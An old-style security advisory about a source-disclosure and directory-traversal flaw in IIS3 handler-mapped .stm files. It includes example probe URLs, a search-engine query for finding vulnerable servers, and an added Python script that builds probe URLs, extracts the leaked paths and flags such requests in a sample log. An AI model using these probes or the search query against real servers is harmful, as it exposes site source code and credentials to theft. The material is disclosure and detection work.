COMMAND
Handler Mapped File Extensions
SYSTEMS AFFECTED
Win NT (with IIS3?)
PROBLEM
'Tanstaafl' posted the following. Handler-mapped file extensions
reveal system file paths for web directories. If you take a
simple URL, like:
http://www.victim.com/asp/something.stm/asp/Index.asp
you get the raw ASP code for the file INDEX.ASP (or anything
else). The handler returns the raw code of the file without going
through Perl 5 (or the appropriate programming language); this
leaves previously undiscovered problems open for attack. (Although
most of the programs are well protected against buffer overflows,
these scripts can be read and the information gained can be used to
"crack" the site.)
A related problem is the ability to traverse the sub-directories:
because the .STM file first reads what is in
http://www.victim.com/, you are able to go from 'd:\main\WWW\' to
any other directory within this hierarchy. Example:
http://www.victim.com/asp/something.stm
Returns "Error processing SSI file 'd:\main\WWW\something.stm'"
http://www.victim.com/asp/something.stm/something.asp
Returns the raw "something.asp" code in the directory
'd:\main\WWW\', and
http://www.victim.com/asp/something.stm/asp/something.asp
Returns the raw "something.asp" code in the directory
'd:\main\WWW\asp\'. This includes any other files you've included
as information handlers (Java class files, VB files, etc.),
even encrypted password files. As long as you know the file names
you can access the raw code. (This also means you can download
it.) Additional credit goes to Michal Zalewski. The HotBot search
engine can be used to locate vulnerable machines:
http://www.search.hotbot.com/hResult.html?MT=Error+processing+SSI+file&SM=phrase&DV=7&RG=.com&DC=100&DE=2&OPs=MDRTP&_v=2&DU=days&SW=web&search.x=37&search.y=14
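The trick described above, turned into something you can run. This is an added example in Python, not code from Tanstaafl's post or from IIS: it builds the probe URL, splits a request into the handler-mapped script and the trailing path info, flags log lines where that path info names a source file, and pulls the disclosed directory out of the SSI error text. The log layout (a simplified "date time client method uri status" format), the SOURCE_EXTS list and all function names are my own assumptions, not anything the post states.

```python
"""Added example (not part of the original post): probe URLs for the
handler-mapping trick, detection over constructed web-server log
lines, and extraction of the file system path leaked by the SSI error.

Assumptions (not stated on the page): SAMPLE_LOG uses a constructed,
simplified "date time client method uri status" layout, and SOURCE_EXTS
is my own list of extensions whose raw source should never be served."""

import re
from urllib.parse import unquote

# Extensions IIS maps to the server-side-include handler.
SSI_EXTS = ("stm", "shtm", "shtml")
# Extensions whose raw content should never reach a client (assumption).
SOURCE_EXTS = {"asp", "inc", "pl", "vb", "class", "pwd"}

# A request path of the form <script>.stm<path info>; the SSI handler
# is handed the trailing path and reads that file verbatim.
PATH_INFO_RE = re.compile(
    r"^(?P<handler>.+?\.(?:" + "|".join(SSI_EXTS) + r"))(?P<pathinfo>/[^?\s]*)",
    re.IGNORECASE,
)

# The SSI error text quoted in the post, which discloses the mapped directory.
SSI_ERROR_RE = re.compile(r"Error processing SSI file '(?P<path>[^']+)'")


def probe_url(base, stm_path, target_path):
    """URL that asks the SSI handler for stm_path to return target_path raw."""
    return base.rstrip("/") + "/" + stm_path.strip("/") + "/" + target_path.lstrip("/")


def split_path_info(uri):
    """Return (handler_script, path_info), or None if nothing follows the .stm."""
    m = PATH_INFO_RE.match(unquote(uri))
    if not m:
        return None
    return m.group("handler"), m.group("pathinfo")


def disclosed_path(body):
    """File system path leaked by an 'Error processing SSI file' body, if any."""
    m = SSI_ERROR_RE.search(body)
    return m.group("path") if m else None


def looks_like_raw_asp(body):
    """True if a response still contains unprocessed ASP script delimiters."""
    return "<%" in body and "%>" in body


def find_source_reads(log_text):
    """Log lines where the path info after an SSI script names a source file."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue
        client, uri = parts[2], parts[4]
        split = split_path_info(uri)
        if split is None:
            continue
        handler, path_info = split
        ext = path_info.rsplit(".", 1)[-1].lower() if "." in path_info else ""
        if ext in SOURCE_EXTS:
            hits.append({"client": client, "handler": handler, "read": path_info})
    return hits


# Constructed sample log (simplified layout, not real IIS output).
SAMPLE_LOG = """\
1998-03-05 12:00:01 10.0.0.5 GET /asp/Index.asp 200
1998-03-05 12:00:07 10.0.0.5 GET /asp/something.stm 500
1998-03-05 12:00:12 10.0.0.5 GET /asp/something.stm/asp/Index.asp 200
1998-03-05 12:00:18 10.0.0.5 GET /asp/something.stm/readme.txt 200
1998-03-05 12:00:20 10.0.0.9 GET /images/logo.gif 200
1998-03-05 12:00:33 10.0.0.5 GET /asp/something.stm/something.asp 200
"""

if __name__ == "__main__":
    print(probe_url("http://www.victim.com", "/asp/something.stm", "/asp/Index.asp"))
    for hit in find_source_reads(SAMPLE_LOG):
        print(hit)
    print(disclosed_path("Error processing SSI file 'd:\\main\\WWW\\something.stm'"))
```

Two of the sample requests are flagged (the reads of /asp/Index.asp and /something.asp); the bare .stm request and the .txt read are not. A response to a probe that still contains <% ... %> is raw source rather than processed output, which is the check to apply when confirming a hit by hand.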
SOLUTION
Display of the file system path seems to be limited to IIS3
servers; IIS4 installs return only the path as provided in
the URL.